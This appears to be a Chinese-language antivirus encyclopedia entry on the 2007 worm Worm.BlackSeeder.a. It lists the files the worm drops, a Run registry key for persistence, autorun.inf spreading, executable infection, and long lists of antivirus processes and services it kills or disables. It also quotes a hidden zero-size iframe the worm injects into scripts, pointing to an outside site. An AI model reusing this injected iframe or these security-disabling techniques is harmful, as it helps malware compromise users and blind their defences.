基本介紹
- 外文名:Worm.BlackSeeder.a
- 處理時間:2007-04-06
- 威脅級別:★
- 病毒類型:蠕蟲
簡介,病毒行為,
簡介
Worm.BlackSeeder.a
病毒別名:
中文名稱:影響系統:Win 9x/ME,Win 2000/NT,Win XP,Win 2003
病毒行為
1、生成的檔案
%DOCUME~1%\ADMINI~1\LOCALS~1\Temp\BLACKSEEDER1.1
%SystemRoot%\Downloaded Program Files\0005486A.exe
%SystemRoot%\Downloaded Program Files\0005486A.DAT
2、添加啟動項
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"MSLOGON" = "C:\WINNT\Downloaded Program Files\0005486A.exe"
3、在個盤下生成autorun.inf啟動,並設定檔案屬性為隱藏。
%X:%\0005486A.exe
%X:%\autorun.inf
4、感染腳本,在腳本末添加
%iframe src=http://www.wangzheqiaodan.com/girl/picture.*** width=0 height=0%%/iframe%
5、感染執行檔,修改原檔案入口,在原檔案加名為BSDR1.1的節。
6、不斷的讀軟區,發現沒軟碟會不斷的彈沒軟碟的錯誤提示。
7、結束下列進程
mcshield.exe
vstskmgr.exe
naprdmgr.exe
aterui.exe
tbmon.exe
scan32.exe
ravmond.exe
ccenter.exe
ravtask.exe
rav.exe
ravmon.exe
ravmond.exe
ravstub.exe
kvxp.kxp
kvmonxp.kxp
kvcenter.kxp
kvsrvxp.exe
kregex.exe
uihost.exe
trojdie.kxp
360Safe.exe
AST.exe
8、修改下列服務,禁止啟動運行
kavsvc
AVP
AVPkavsvc
McAfeeFramework
McShield
McTaskManager
McAfeeFramework McShield
McTaskManager
navapsvc
KVWSC
KVSrvXP
Schedule
sharedaccess
RsCCenter
RsRavMon
RsCCenter
RsRavMon
wscsvc
KPfwSvc
SNDSrvc
ccProxy
ccEvtMgr
ccSetMgr
SPBBCSvc
Symantec
Core LC
NPFMntor
MskService
FireSvc
Alerter